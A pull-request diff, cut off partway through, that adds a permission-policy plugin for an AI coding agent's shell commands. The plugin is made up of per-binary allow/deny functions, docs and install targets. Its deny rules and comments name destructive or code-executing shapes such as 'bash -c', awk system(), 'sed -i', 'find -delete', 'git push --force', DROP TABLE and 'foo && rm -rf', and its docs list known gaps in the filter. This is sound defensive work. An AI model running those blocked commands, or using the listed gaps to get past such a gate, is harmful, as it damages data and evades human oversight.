### PR TITLE
feat(permission-policy): mika-side plugin — per-binary safety functions (mika#1817, UNBLOCK cpp per-spawn flip)

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -1,7 +1,7 @@
 INSTALL_DIR ?= $(HOME)/.local/bin
 BINARIES := mika mika-spirit mika-gateway
 
-.PHONY: build build-dashboard deploy stop restart install test test-async-db-saturation test-dispatch-symmetry verify-bundled-skills lint fmt check check-ngrok deploy-info clean help calibrate-mika-dev calibrate-mika-arch calibrate-mika-qa calibrate-mika-orchestrator
+.PHONY: build build-dashboard deploy stop restart install install-permission-policy-plugin test-permission-policy-plugin test test-async-db-saturation test-dispatch-symmetry verify-bundled-skills lint fmt check check-ngrok deploy-info clean help calibrate-mika-dev calibrate-mika-arch calibrate-mika-qa calibrate-mika-orchestrator
 
 help: ## Show this help
 	@grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "  \033[36m%-20s\033[0m %s\n", $$1, $$2}'
@@ -43,6 +43,22 @@ install: ## Copy release binaries to INSTALL_DIR (safe while services run)
 	done
 
 deploy: deploy-info build-dashboard build install restart check-ngrok ## Full deploy: build, install, restart
+
+install-permission-policy-plugin: ## Install mika-permission-policy plugin into claude-pilot's uv tool env (mika#1817)
+	@# The plugin lives in tools/mika_permission_policy/ and provides the
+	@# per-binary safety functions loaded by claude-pilot's per-spawn evaluator
+	@# when MIKA_PERMISSION_POLICY_MODE=per_spawn +
+	@# MIKA_PERMISSION_POLICY_MODULE=mika_permission_policy:get_policy are set.
+	@#
+	@# `--with-editable` injects the plugin into the same uv tool env as
+	@# claude-pilot so the running interpreter can `import mika_permission_policy`.
+	@# `--reinstall --force` matches the discipline in the meta-repo
+	@# CLAUDE.md deploy target for claude-pilot itself.
+	uv tool install --reinstall --force --editable ../claude-pilot \
+		--with-editable ./tools/mika_permission_policy
+
+test-permission-policy-plugin: ## Run the permission-policy plugin test suite (mika#1817)
+	cd tools/mika_permission_policy && uv sync --all-extras --quiet && uv run pytest -q
 
 check-ngrok: ## Warn if ngrok is not running (Telegram webhooks need it)
 	@if ! curl -sf http://localhost:4040/api/tunnels > /dev/null 2>&1; then \

--- a/docs/solutions/security-issues/1817-mika-side-plugin-per-binary-safety-functions.md
+++ b/docs/solutions/security-issues/1817-mika-side-plugin-per-binary-safety-functions.md
@@ -1,0 +1,118 @@
+---
+module: permission-policy, claude-pilot, per-spawn-evaluator
+tags: [permission-policy, per-spawn, plugin, ssc-oss-boundary, tier1-parity, structural-typing]
+problem_type: architecture-pattern
+category: security-issues
+date: 2026-07-22
+ticket: mika#1817
+applies_when:
+  - "Implementing a downstream policy contract for an OSS library that must keep private allow/deny contents out of the public repo"
+  - "Porting compound-string safety logic (e.g. tier1.py) to per-spawn / per-argv shape"
+  - "Establishing parity between an old classifier and a new decomposition-based evaluator during an opt-in Phase 1 migration"
+resolution_type: pattern
+---
+
+# mika-side plugin pattern — per-binary safety functions on the SSC OSS boundary
+
+## TL;DR
+
+`claude-pilot#90` shipped the generic per-spawn permission-policy engine with an empty `DEFAULT_POLICY`. **mika#1817** ships the Mika-specific allow/deny CONTENTS as a separate Python package (`tools/mika_permission_policy/`) that plugs into the engine at runtime via `MIKA_PERMISSION_POLICY_MODULE=mika_permission_policy:get_policy`. Every safety function preserves **parity** with the equivalent rule in classic `claude-pilot/src/claude_pilot/tier1.py` — parity is the correctness contract for Phase 1 opt-in of `mika#1708`.
+
+The pattern splits the concern along the SSC OSS boundary (ratified 2026-07-01): the engine is public and generic; the CONTENTS are private and downstream. Structural typing on the `PolicyFn` protocol (`Callable[[list[str], str], bool]`) means the plugin can be installed and tested without claude-pilot present, and any downstream consumer implementing the same protocol can use the plugin verbatim.
+
+## Founding context (2026-07-22)
+
+The autonomous loop was stalled ~5 days: 25 ready issues frozen, 0 merges. Root cause per `mika-dev`'s core memory: `claude-pilot-py policy:deny halts on 20+ common bash commands`. The classic classifier in `tier1.py` denies legitimate compositional shell (pipes-to-conditional-`awk`, `cd`-then-`grep`, chain-with-`echo`) because it operates on raw command STRINGS with syntactic pattern-matching. `mika#1686` documented the n=13+ shape class in 24 hours; every new operator idiom generates a fresh n=1.
+
+Prime-ratified fix (`mika#1686` → Option C in `mika#1708`): decompose the command upfront with `bashlex`, track `cwd_stack` for `cd`, evaluate each resulting spawn against a per-binary safety function. The generic engine ships in `claude-pilot` (public repo, Apache 2.0, empty `DEFAULT_POLICY`); the Mika-specific safety functions ship as a downstream plugin.
+
+## Pattern
+
+### Three-layer separation
+
+| Layer | Repo | Ownership | Content |
+|---|---|---|---|
+| Engine | `senara-solutions/claude-pilot` | Public OSS | `bashlex` decomposition, `cwd_stack`, per-spawn evaluator API, mode selection env vars, audit events. Ships with `DEFAULT_POLICY = {}` and `load_policy_from_module()`. |
+| Plugin (this doc) | `senara-solutions/mika/tools/mika_permission_policy/` | Mika-side private | `get_policy()` returns `dict[str, PolicyFn]` — per-binary safety functions mirroring tier1's classic allow/deny logic. |
+| Install glue | `senara-solutions/mika/Makefile` | Mika-side | `install-permission-policy-plugin` target: `uv tool install --reinstall --force --editable ../claude-pilot --with-editable ./tools/mika_permission_policy` — injects the plugin into the same `uv tool` env as claude-pilot so the running interpreter can `import mika_permission_policy` at handler creation time. |
+
+### Structural typing over import coupling
+
+The plugin does **not** import `claude_pilot.per_spawn.PolicyFn`:
+
+```python
+# mika_permission_policy/__init__.py
+from collections.abc import Callable
+
+PolicyFn = Callable[[list[str], str], bool]  # protocol, structural typing
+
+def get_policy() -> dict[str, PolicyFn]:
+    return {"grep": is_safe_grep, ...}
+```
+
+Consequences:
+
+- The plugin is testable in environments where claude-pilot is absent (CI without cpp, upstream contributor forks).
+- No version pin between plugin and engine — any cpp release implementing the same protocol works.
+- Any downstream consumer (not just Mika) can use the plugin verbatim by setting `MIKA_PERMISSION_POLICY_MODULE=mika_permission_policy:get_policy` — the module namespace is not Mika-only despite the historical name.
+
+### Parity as the correctness contract
+
+Every safety function mirrors the equivalent rule in `claude-pilot/src/claude_pilot/tier1.py`:
+
+- What tier1 auto-approves on a compound STRING, the plugin auto-approves on the corresponding decomposed `Spawn` (bashlex-tokenized `argv`).
+- What tier1's `TIER3_PATTERNS` denies, the plugin denies at the argv level (`sed -i`, `git push --force`, `git push origin main/master`, `git branch -D`, `cargo publish`, `bash -c`, `sh -c`, `DROP TABLE`, `DELETE FROM`, …).
+- What tier1's `_is_safe_find_command` / `_is_safe_sort_command` / `_is_safe_gh_command` guard, the plugin guards with the same closed-world allowlists (`FIND_EXEC_SAFE_COMMANDS`, sort's `-o`/`--output` denial, gh's domain+verb allowlist).
+
+Parity is the **correctness contract for Phase 1 opt-in**: if the plugin denies a shape that classic allows, the migration is unsafe. Test suite `tests/test_binaries.py` locks this contract with parametrized cases drawn from `tier1.py`'s own allowed shapes and TIER3 denials.
+
+### What the plugin does NOT check
+
+The engine's `per_spawn.decompose()` already refuses these at the raw-source level, so per-binary functions never see them:
+
+- Command substitution (`` `...` ``, `$(...)`), heredocs (`<<`), process substitution (`<(...)`, `>(...)`), arithmetic expansion (`$((...))`).
+- Control flow (`if`, `for`, `while`, `case`, `select`, `until`, functions).
+- Dynamic execution builtins (`eval`, `source`, `.`, `exec`).
+- Chain safety across multiple spawns — each spawn is evaluated independently; every one must pass.
+
+Per-binary functions only own the shape that survived to their argv: forbidden flags, unsafe subcommands, sub-feature guards.
+
+### Accepted risks inherited from tier1
+
+- **GNU-grep assumption.** `grep`/`egrep`/`fgrep` treat every invocation as read-only. GNU grep is; `ugrep` (a drop-in `grep` on some Gentoo/BSD/Homebrew hosts) has `--filter`/`--pager`/`--view` that execute commands. tier1 documented this accepted risk on the pilot's standard-Linux target where GNU grep 3.12 is resolved. If the deployment target changes, drop grep from the registry entirely — do NOT try to parse inner sub-flags (inner-arg lexing is a forbidden posture per `claude-pilot/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md § 4`).
+- **`awk s/foo/bar/e` and `sed` `e` command inside script strings.** Detecting these requires parsing the awk/sed script — out of scope. tier1 does not detect them either (raw-string regex has the same blind spot). Same accepted risk, same downstream mitigation (relay-level judgment on unusual inputs).
+- **Missing entries auto-deny.** Any binary not in the registry rejects. If Mika's operator idioms include a binary not listed here, the dispatch falls through to classic tier2 / relay during Phase 1 opt-in, or to a hard-deny once Phase 3 retires classic. Monitor `perm_policy_rollback` audit events during Phase 2 and expand the registry as evidence arrives.
+
+## Deploy path (double-gated per plan)
+
+1. **Merge** the plugin PR — Vincent (repo scope, per supervision model).
+2. **Reinstall on gentux** — `make install-permission-policy-plugin` (Vincent, his box). This runs `uv tool install --reinstall --force --editable ../claude-pilot --with-editable ./tools/mika_permission_policy`, so the plugin package lands in the same uv tool env as claude-pilot.
+3. **Flip env vars** per canary session (or persistently in `~/.mika/.env`) — Vincent:
+   ```
+   MIKA_PERMISSION_POLICY_MODE=per_spawn
+   MIKA_PERMISSION_POLICY_MODULE=mika_permission_policy:get_policy
+   ```
+
+After canary success: monitor `[claude-pilot audit_event] {"kind": "perm_policy_rollback"}` on stderr. When N=50 dispatches with zero rollbacks accumulate, ratify Phase 2 default flip with Vincent. Phase 3 (retiring `tier1.py`'s Bash paths and `permissions.yaml`'s Bash rules) is a separate follow-up after M=7 days on default `per_spawn` with zero rollbacks.
+
+## When to reach for this pattern
+
+- **You have an OSS engine that must accept downstream policy CONTENTS.** The plugin protocol pattern (Python `entry-point`-style module ref, structural typing on the contract, zero import coupling) keeps the boundary clean.
+- **You're migrating from an old classifier to a new one with opt-in Phase 1.** The parity contract lets you enable the new evaluator without changing behavior on merge — the default stays classic, operators flip a canary, audit events feed the flip decision.
+- **You need to authorize per-invocation safety judgment (argv + cwd) rather than raw-string pattern matching.** The per-binary shape gives each rule a small, testable surface with a clear name (`is_safe_grep`, `is_safe_git`) that maps 1:1 onto the semantic notion of the invocation.
+
+## When NOT to reach for this pattern
+
+- If the classifier only needs a raw-string allow-list of full commands, per-binary decomposition is over-engineered. Reach for it only when compositional shell idioms (`|`, `;`, `&&`, `cd`+X) are the wedge.
+- If the downstream consumer is inside the same repo as the engine, the plugin indirection is unnecessary — a plain function call suffices. This pattern earns its keep only across a repository boundary.
+
+## References
+
+- `mika#1817` — this plugin
+- `mika#1708` — architect-ratified Option C spec (session `22d21b66-eacd-4120-bb0a-cc11ce5b4f5d`, 2026-07-01 ~11:35Z)
+- `mika#1686` — Prime-ratified class-level fix
+- `senara-solutions/claude-pilot#90` — the generic engine PR
+- `claude-pilot/src/claude_pilot/tier1.py` — the classic classifier this plugin preserves parity with
+- `claude-pilot/src/claude_pilot/per_spawn.py` — the engine that loads this plugin
+- `claude-pilot/docs/permission-mode.md` — mode-selection guide, wire shape of audit events
+- Plan doc `mika/docs/plans/2026-07-01-008-feat-1708-per-spawn-permission-gate-plan.md` on branch `feat/1708/permission-policy-cpp-per-spawn` — the architect-committed sequencing

--- a/tools/mika_permission_policy/.gitignore
+++ b/tools/mika_permission_policy/.gitignore
@@ -1,0 +1,6 @@
+__pycache__/
+*.pyc
+.venv/
+.pytest_cache/
+.mypy_cache/
+.ruff_cache/

--- a/tools/mika_permission_policy/README.md
+++ b/tools/mika_permission_policy/README.md
@@ -1,0 +1,84 @@
+# mika-permission-policy
+
+Mika-side per-binary safety functions for the [claude-pilot](https://github.com/senara-solutions/claude-pilot) per-spawn permission-policy evaluator. Ships the private allow/deny CONTENTS that live on Mika's side of the SSC OSS boundary; claude-pilot ships the generic engine (`per_spawn.py`, empty `DEFAULT_POLICY`) and loads this plugin at runtime.
+
+Design source: [mika#1708](https://github.com/senara-solutions/mika/issues/1708) architect-ratified spec, [mika#1817](https://github.com/senara-solutions/mika/issues/1817) this plugin.
+
+## Install
+
+The plugin must be importable by claude-pilot's Python environment. If claude-pilot was installed via `uv tool install`, add this plugin to the same tool env:
+
+```bash
+# From mika/ root (this repo)
+uv tool install --reinstall --force --editable ../claude-pilot \
+  --with-editable ./tools/mika_permission_policy
+```
+
+Or the Makefile target:
+
+```bash
+make install-permission-policy-plugin
+```
+
+Once installed, flip the two env vars claude-pilot reads at handler creation:
+
+```bash
+export MIKA_PERMISSION_POLICY_MODE=per_spawn
+export MIKA_PERMISSION_POLICY_MODULE=mika_permission_policy:get_policy
+```
+
+Set them per-session (`env VAR=... mika ask ...`) for canary testing, or persistently in `~/.mika/.env`.
+
+## What ships
+
+`get_policy()` returns a `dict[str, PolicyFn]` where each entry maps a binary basename to a safety function of shape `(argv: list[str], cwd: str) -> bool`. The registry mirrors the auto-approve semantics of `claude_pilot.tier1` — parity is the correctness contract for Phase 1 opt-in (see `tests/test_binaries.py`).
+
+Initial binary set (mika#1708 AC3):
+
+| Binary | Guard |
+|---|---|
+| `grep` / `egrep` / `fgrep` | allow-all read-only (accepted risk: GNU-grep assumption, see below) |
+| `awk` | deny `system()`, `getline \| "cmd"`, `print \| "cmd"` |
+| `sed` | deny `-i` / `--in-place` in any short-flag cluster |
+| `cat` / `ls` / `head` / `tail` / `wc` / `stat` / `file` / `which` / `type` / `pwd` / `date` / `uniq` / `tr` / `cut` / `diff` / `comm` / `realpath` / `readlink` / `dirname` / `basename` / `test` / `[` | allow-all read-only |
+| `find` | deny `-delete`, `-fprintf`/`-fprint`/`-fprint0`/`-fls`, `-exec/-execdir/-ok/-okdir <cmd>` unless `<cmd>` is in the FIND_EXEC_SAFE_COMMANDS allowlist |
+| `sort` | deny `-o` / `--output` (all abbreviations and cluster positions) |
+| `git` | subcommand allowlist + deny `--force`, `push origin main/master`, `branch -D`, `reset` |
+| `gh` | domain+verb allowlist + deny `api` mutation flags (`-X`, `--method`, `-f`, `-F`, `--field`, `--raw-field`, `--input`) |
+| `cargo` | subcommand allowlist (deny `publish`, `install`, `run`) |
+| `make` | closed-world target allowlist (`verify-bundled-skills` only, no extra tokens) |
+| `sqlite3` | deny `DROP`/`DELETE`/`INSERT`/`UPDATE`/`ALTER`/`CREATE`/`TRUNCATE`/`VACUUM` (case-insensitive) |
+| `bash` / `sh` | deny `-c` (any short-flag cluster containing 'c') |
+| `echo` / `printf` / `true` / `false` / `:` | allow-all no-op |
+
+Binaries not in the registry deny by default — `per_spawn.evaluate()` treats a missing entry as a reject, dropping through to classic tier2 / relay during Phase 1 opt-in.
+
+## Adding a binary
+
+1. Add the safety function to `mika_permission_policy/_binaries.py` with signature `(argv: list[str], cwd: str) -> bool`.
+2. Register it in `mika_permission_policy/__init__.py:get_policy()`.
+3. Add tests to `tests/test_binaries.py` covering known-safe and known-deny argv shapes.
+4. Update the table above.
+
+Parity discipline: if `tier1.py` allows a shape and this plugin denies it, that is a REGRESSION unless the deny is on a shape the security review of tier1 already flagged. Prefer expanding tier1's own accepted-risks documentation over silently diverging here.
+
+## Accepted risks (inherited from tier1)
+
+- **GNU grep assumption.** `grep`/`egrep`/`fgrep` treat the invocation as read-only. GNU grep is; ugrep (a drop-in `grep` on some Gentoo/BSD/Homebrew hosts) has `--filter`/`--pager`/`--view` that execute commands. tier1 documented this as an accepted risk on the pilot's standard-Linux target where GNU grep 3.12 is resolved. If the deployment target changes, drop grep from the registry entirely — do NOT try to parse `--filter` (inner-arg lexing is a forbidden posture per `claude-pilot/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md § 4`).
+- **awk `s/foo/bar/e` and sed `e` command inside script strings.** Detecting these requires parsing the awk/sed script — out of scope. tier1 does not detect them either (raw-string regex has the same blind spot). Same accepted risk, same downstream mitigation (relay-level judgment on unusual inputs).
+- **Missing entries auto-deny.** Any binary not in the registry rejects. If Mika's operator idioms include a binary not listed here, the dispatch falls through to classic tier2 / relay during Phase 1 opt-in, or to a hard-deny once Phase 3 retires classic. Monitor `perm_policy_rollback` audit events during Phase 2 and expand this registry as evidence arrives.
+
+## What this plugin does NOT check
+
+per_spawn's engine already refuses these at the raw-source level, so per-binary functions never see them:
+
+- Command substitution (`` `...` ``, `$(...)`), heredocs (`<<`), process substitution (`<(...)`, `>(...)`), arithmetic expansion (`$((...))`)
+- Control flow (`if`, `for`, `while`, `case`, `select`, `until`, functions)
+- Dynamic execution builtins (`eval`, `source`, `.`)
+- Chain safety across multiple spawns — each spawn is evaluated independently; every one must pass
+
+Path containment for filesystem targets is out of scope (that is the Write/Edit tool's concern, not Bash's — mirrors tier1).
+
+## Structural typing note
+
+We deliberately do NOT import `claude_pilot.per_spawn.PolicyFn` at package-import time. The protocol is `Callable[[list[str], str], bool]` — plain structural typing — so this plugin can be installed alongside any cpp version implementing the same protocol without a version pin coupling. This keeps SSC OSS boundary discipline (per mika#1708 landing shape): the plugin is a downstream consumer of the protocol, not a dependent of the exact cpp release.

--- a/tools/mika_permission_policy/mika_permission_policy/__init__.py
+++ b/tools/mika_permission_policy/mika_permission_policy/__init__.py
@@ -1,0 +1,142 @@
+"""Mika-side per-binary safety functions for claude-pilot per-spawn evaluator.
+
+Loaded by claude-pilot when ``MIKA_PERMISSION_POLICY_MODULE=mika_permission_policy:get_policy``.
+See ``docs/permission-mode.md`` in claude-pilot for the plugin protocol and
+``README.md`` here for authoring conventions.
+
+## Source of authoritative logic
+
+Every safety function in this package **preserves parity** with the equivalent
+compound-string logic in ``claude-pilot/src/claude_pilot/tier1.py`` — the pre-existing
+classic evaluator. Parity is the correctness contract for Phase 1 opt-in of
+``mika#1708``: the same commands that auto-approved under classic must auto-approve
+under per_spawn, or the migration is unsafe.
+
+Where classic operates on a compound STRING (splitting + scanning for
+metacharacters), per_spawn operates on a decomposed ``Spawn`` (already tokenized
+into ``argv`` by bashlex, cwd tracked separately). So each per-binary function
+here only checks the shape it OWNS: forbidden flags, unsafe subcommands, etc.
+Compound-safety (chain injection, substitution, redirects) is already handled
+by ``claude_pilot.per_spawn`` before any of these functions run.
+
+## Design source
+
+- ``mika#1817`` — this package
+- ``mika#1708`` architect-ratified spec (session 22d21b66, 2026-07-01 ~11:35Z)
+- ``mika#1686`` — Prime-ratified C class-level fix
+- ``claude-pilot#90`` — the per-spawn engine (empty ``DEFAULT_POLICY`` awaiting this plugin)
+"""
+
+from __future__ import annotations
+
+from collections.abc import Callable
+
+from mika_permission_policy._binaries import (
+    is_safe_awk,
+    is_safe_basename,
+    is_safe_bash,
+    is_safe_cargo,
+    is_safe_cat,
+    is_safe_comm,
+    is_safe_cut,
+    is_safe_date,
+    is_safe_diff,
+    is_safe_dirname,
+    is_safe_file,
+    is_safe_find,
+    is_safe_gh,
+    is_safe_git,
+    is_safe_grep,
+    # Extras beyond the AC3 initial 13 — same-family read-only tools that
+    # classic tier1 already allows (see SAFE_SHELL_COMMANDS), included so
+    # per_spawn parity holds without pulling operators through relay round-trips
+    # for shapes classic already auto-approves.
+    is_safe_head,
+    is_safe_ls,
+    is_safe_make,
+    # No-op safe builtins (allow-all)
+    is_safe_no_op,
+    is_safe_pwd,
+    is_safe_readlink,
+    is_safe_realpath,
+    is_safe_sed,
+    is_safe_sh,
+    is_safe_sort,
+    is_safe_sqlite3,
+    is_safe_stat,
+    is_safe_tail,
+    is_safe_test,
+    is_safe_tr,
+    is_safe_type,
+    is_safe_uniq,
+    is_safe_wc,
+    is_safe_which,
+)
+
+# The per_spawn.PolicyFn protocol is (argv: list[str], cwd: str) -> bool.
+# We do NOT import claude_pilot.per_spawn.PolicyFn here so this plugin stays
+# importable in environments where claude-pilot is absent (tests, CI without
+# cpp installed). Structural typing is enough.
+PolicyFn = Callable[[list[str], str], bool]
+
+
+def get_policy() -> dict[str, PolicyFn]:
+    """Return the Mika per-binary safety-function registry.
+
+    Called by ``claude_pilot.per_spawn.load_policy_from_module`` at handler
+    creation time (once per pilot session). Each entry maps a binary basename
+    to its safety function. Binaries not in the registry deny by default
+    (see :func:`claude_pilot.per_spawn.evaluate` — missing entry = reject).
+    """
+    return {
+        # ── AC3 initial 13 binaries (mika#1708) ──
+        "grep": is_safe_grep,
+        "awk": is_safe_awk,
+        "sed": is_safe_sed,
+        "cat": is_safe_cat,
+        "ls": is_safe_ls,
+        "find": is_safe_find,
+        "git": is_safe_git,
+        "gh": is_safe_gh,
+        "cargo": is_safe_cargo,
+        "make": is_safe_make,
+        "sqlite3": is_safe_sqlite3,
+        "bash": is_safe_bash,
+        "sh": is_safe_sh,
+        # ── grep family (same read-only safety as `grep`) ──
+        "egrep": is_safe_grep,
+        "fgrep": is_safe_grep,
+        # ── Read-only shell utilities from classic SAFE_SHELL_COMMANDS ──
+        "head": is_safe_head,
+        "tail": is_safe_tail,
+        "wc": is_safe_wc,
+        "stat": is_safe_stat,
+        "file": is_safe_file,
+        "which": is_safe_which,
+        "type": is_safe_type,
+        "pwd": is_safe_pwd,
+        "date": is_safe_date,
+        "sort": is_safe_sort,
+        "uniq": is_safe_uniq,
+        "tr": is_safe_tr,
+        "cut": is_safe_cut,
+        "diff": is_safe_diff,
+        "comm": is_safe_comm,
+        "realpath": is_safe_realpath,
+        "readlink": is_safe_readlink,
+        "dirname": is_safe_dirname,
+        "basename": is_safe_basename,
+        "test": is_safe_test,
+        "[": is_safe_test,
+        # ── No-op safe builtins (per_spawn NO_OP_SAFE_BUILTINS mirror) ──
+        # per_spawn still emits a Spawn for these so a downstream policy CAN
+        # audit / rate-limit them; here we simply allow.
+        "echo": is_safe_no_op,
+        "printf": is_safe_no_op,
+        "true": is_safe_no_op,
+        "false": is_safe_no_op,
+        ":": is_safe_no_op,
+    }
+
+
+__all__ = ["PolicyFn", "get_policy"]

--- a/tools/mika_permission_policy/mika_permission_policy/_binaries.py
+++ b/tools/mika_permission_policy/mika_permission_policy/_binaries.py
@@ -1,0 +1,461 @@
+"""Per-binary safety functions — parity with claude_pilot.tier1.
+
+Each function takes ``(argv, cwd)`` where ``argv[0]`` is the binary basename
+(as written in the shell command, not resolved through ``$PATH``). Returns
+``True`` if the invocation is safe to auto-approve, ``False`` otherwise.
+
+## Parity with tier1.py
+
+Every deny here mirrors a rule that tier1's compound-string logic ALREADY
+enforces on the same shape. When tier1 said no to ``sed -i``, we say no to
+``sed`` with ``-i`` in argv. When tier1 said no to ``git push --force``, we
+say no to ``git push`` with ``--force`` in argv. The regression suite in
+``tests/test_parity.py`` locks this contract.
+
+## What we do NOT check here
+
+- Command substitution (``$(...)``, backticks), heredocs, arithmetic — the
+  per_spawn engine (``decompose()`` pre-checks) already refuses those at the
+  raw-source level. If we see argv here at all, the command already passed
+  those gates.
+- Chain safety (``foo && rm -rf``, ``foo | evil``) — per_spawn decomposes
+  into per-Spawn calls; each Spawn is evaluated independently. Every spawn
+  must pass or the whole command denies.
+- Path containment for filesystem targets — this is a Write/Edit tool
+  concern, not a Bash one, and tier1 doesn't check it either.
+"""
+
+from __future__ import annotations
+
+# ── Read-only tools (allow-all) ─────────────────────────────────────────────
+#
+# These commands are pure read/inspect operations. Their safety follows from
+# the binary having no write side effects at all, so any argv is safe. Match
+# tier1.SAFE_SHELL_COMMANDS membership + the ``return True`` fall-through in
+# ``is_safe_shell_command`` (no special-case guard fires for these).
+
+
+def is_safe_grep(argv: list[str], cwd: str) -> bool:
+    # See tier1.py comment on FIND_EXEC_SAFE_COMMANDS: grep-family safety
+    # depends on GNU grep being resolved (not ugrep). We inherit the same
+    # accepted-risk boundary — do NOT parse `--filter`/`--pager`/`--view`
+    # sub-flags; if ugrep-as-grep enters scope, drop grep entirely.
+    return True
+
+
+def is_safe_cat(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_ls(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_head(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_tail(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_wc(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_stat(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_file(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_which(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_type(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_pwd(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_date(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_uniq(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_tr(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_cut(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_diff(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_comm(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_realpath(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_readlink(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_dirname(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_basename(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_test(argv: list[str], cwd: str) -> bool:
+    return True
+
+
+def is_safe_no_op(argv: list[str], cwd: str) -> bool:
+    """echo / printf / true / false / : — allow-all no-op family."""
+    return True
+
+
+# ── awk / sed — general-purpose interpreters ────────────────────────────────
+#
+# tier1 EXPLICITLY DROPS awk and sed from SAFE_SHELL_COMMANDS (cpp#27) because
+# awk `system()` / sed `e` command have arbitrary-code-execution sub-features
+# an exhaustive guard can't enumerate. tier1 routes them to policy/relay.
+#
+# For per_spawn Phase 1, we cannot preserve tier1 parity by dropping these —
+# per_spawn expects a PolicyFn per binary and missing = deny. Denying `awk`/
+# `sed` outright would REGRESS on the exact operator idioms mika#1708 exists
+# to unblock (`grep | awk '$1 > N'`, `sed 's/foo/bar/' file`).
+#
+# Compromise: deny the two proven-dangerous sub-features (awk system/exec,
+# sed -i / e command / e flag), allow the rest. Documented as accepted risk
+# in README.md § accepted-risks so any regression review sees it.
+
+
+def is_safe_awk(argv: list[str], cwd: str) -> bool:
+    """Allow awk except for known code-execution sub-features.
+
+    Denied features (rationale in README.md § awk):
+    - ``system(...)`` — shells out.
+    - ``getline ... | "cmd"`` / ``print ... | "cmd"`` — pipe to shell.
+    - ``| "cmd" | getline`` — inverse pipe from shell.
+
+    We check for these as literal substrings in argv values. This is a
+    coarse over-block on strings that happen to contain e.g. ``system(``
+    as data (rare); the safe direction.
+    """
+    for arg in argv[1:]:
+        if "system(" in arg:
+            return False
+        # print ... | "cmd" — the `| "` pattern (with optional whitespace)
+        # indicates a pipe to shell command. `|"` alone (no whitespace)
+        # is the same. Match both.
+        if '| "' in arg or '|"' in arg or "| '" in arg or "|'" in arg:
+            return False
+        if "getline" in arg and "|" in arg:
+            # `getline ... | "cmd"` or `"cmd" | getline` — pipe form
+            # either direction. Deny to be safe.
+            return False
+    return True
+
+
+def is_safe_sed(argv: list[str], cwd: str) -> bool:
+    """Allow sed except for in-place edit.
+
+    Denied features:
+    - ``--in-place`` / ``--in-place=SUFFIX`` — GNU long form.
+    - ``-i`` / ``-iSUFFIX`` — short form.
+    - Any short-flag cluster containing ``i`` (e.g. ``-ni``, ``-Ei``).
+
+    tier1's TIER3_PATTERNS catches this via the raw-string regex
+    ``\\bsed\\s+(-\\w*i|-i\\w*)\\b`` — we mirror by rejecting any short-flag
+    cluster containing ``i``.
+
+    Accepted risk (documented in README § accepted-risks): the ``e`` command
+    trailing a substitution (``s/foo/bar/e``) is not detected here — parsing
+    sed scripts is out of scope. tier1 does not detect it either (same regex),
+    so parity holds. Downstream policy/relay handles rare `e`-flag cases.
+    """
+    for arg in argv[1:]:
+        if arg == "--in-place" or arg.startswith("--in-place="):
+            return False
+        # Short-flag cluster containing 'i' anywhere (`-i`, `-iSUFFIX`,
+        # `-ni`, `-Ei`).
+        if arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
+            if "i" in arg[1:]:
+                return False
+    return True
+
+
+# ── find — write actions + exec-class guard ─────────────────────────────────
+#
+# Mirrors tier1._is_safe_find_command. `-delete` and file-write actions
+# (`-fprintf`, `-fprint`, `-fprint0`, `-fls`) always deny. `-exec`/`-execdir`/
+# `-ok`/`-okdir` allow only when the inner binary is in the closed-world
+# read-only allowlist.
+#
+# We inherit tier1's FIND_EXEC_SAFE_COMMANDS verbatim (grep/egrep/fgrep,
+# cat/head/tail/wc, ls/stat/file, basename/dirname/readlink/realpath,
+# echo/printf).
+
+FIND_EXEC_SAFE_COMMANDS: frozenset[str] = frozenset({
+    "grep", "egrep", "fgrep",
+    "cat", "head", "tail", "wc",
+    "ls", "stat", "file",
+    "basename", "dirname", "readlink", "realpath",
+    "echo", "printf",
+})
+
+_FIND_DELETE_FLAGS: frozenset[str] = frozenset({"-delete"})
+_FIND_WRITE_FLAGS: frozenset[str] = frozenset({
+    "-fprintf", "-fprint0", "-fprint", "-fls",
+})
+_FIND_EXEC_FLAGS: frozenset[str] = frozenset({
+    "-exec", "-execdir", "-ok", "-okdir",
+})
+
+
+def is_safe_find(argv: list[str], cwd: str) -> bool:
+    i = 1
+    while i < len(argv):
+        tok = argv[i]
+        if tok in _FIND_DELETE_FLAGS or tok in _FIND_WRITE_FLAGS:
+            return False
+        if tok in _FIND_EXEC_FLAGS:
+            # The next token is the inner binary.
+            if i + 1 >= len(argv):
+                return False  # bare -exec with no inner cmd
+            inner = argv[i + 1]
+            if inner not in FIND_EXEC_SAFE_COMMANDS:
+                return False
+            # Skip the inner-cmd token; the rest are its args (we don't
+            # parse them, matching tier1 discipline).
+            i += 2
+            continue
+        i += 1
+    return True
+
+
+# ── sort — deny -o / --output write flag ────────────────────────────────────
+#
+# Mirrors tier1._is_safe_sort_command (cpp#64). `-o FILE` and `--output=FILE`
+# are arbitrary-file-write primitives via a sort built-in (bypassing the
+# shell redirect Tier-3 pattern). Deny in any of their shapes.
+
+
